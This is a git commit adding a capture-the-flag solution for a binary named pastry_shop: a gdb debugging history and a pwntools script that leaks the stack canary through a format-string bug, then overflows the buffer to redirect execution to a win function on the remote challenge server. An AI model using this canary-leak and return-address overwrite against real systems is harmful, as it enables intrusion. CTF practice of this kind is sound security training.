Second CTFs part

2026-05-10 20:42:33 +02:00
parent 5635246581
commit 9f240eba3b
87 changed files with 404506 additions and 0 deletions
--- a/canary/01_pastry_shop/.gdb_history
+++ b/canary/01_pastry_shop/.gdb_history
@@ -0,0 +1,56 @@
+quit
+disass vuln
+b *0x00000000004013fa
+disass vuln
+r
+print $rax
+disass vuln
+info registers
+c
+clear
+r
+x/10x $rsp
+x/10x $rsp - 0x8
+disass vuln
+x/10x $rbp - 0x8
+x/10x $fs
+x/10x 0x28
+x/10x $rbp
+x/10x $rbp - 0x8
+x/10x ($rbp - 0x8)
+r
+quit
+disass vuln
+b *0x00000000004013fa
+r
+print $rax
+info registers
+disass vuln
+b *0x00000000004013f6
+r
+r
+r
+r
+disass vuln
+r
+n
+r
+r
+disass vuln
+b *0x00000000004013f5
+r
+print $rax
+n
+print $rax
+n
+print $rax
+info registers
+print 0x7fffffffda28
+gdb config context.nb_lines_stack 32
+gef config context.nb_lines_stack 32
+r
+n
+r
+r
+oaacpaacqaacraacsaactaacuaacvaacwaacxaacyaac
+quit
--- a/canary/01_pastry_shop/pastry_shop
+++ b/canary/01_pastry_shop/pastry_shop
--- a/canary/01_pastry_shop/solve.py
+++ b/canary/01_pastry_shop/solve.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python3
+from pwn import *
+
+# elf = context.binary = ELF('./pastry_shop', checksec=False)
+
+# %lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx
+CANARY_IDX = 23
+OFFSET_TO_CANARY = 72
+# Space between canary and RIP
+OFFSET_TO_RIP = 88
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13538)
+p.recvuntil(b"dear customer?\n")
+p.sendline(f"%{CANARY_IDX}$lx".encode())
+leak = p.recvline().strip()
+canary = int(leak, 16)
+log.info(f"canary = {canary:#x}")
+win_addr = 0x00000000004012C2
+p.recvuntil(b"to order?\n")
+
+payload = flat(
+    b"A" * OFFSET_TO_CANARY,
+    p64(canary),
+    b"B" * (OFFSET_TO_RIP - OFFSET_TO_CANARY - 8),
+    p64(win_addr),
+)
+
+p.send(payload)
+p.interactive()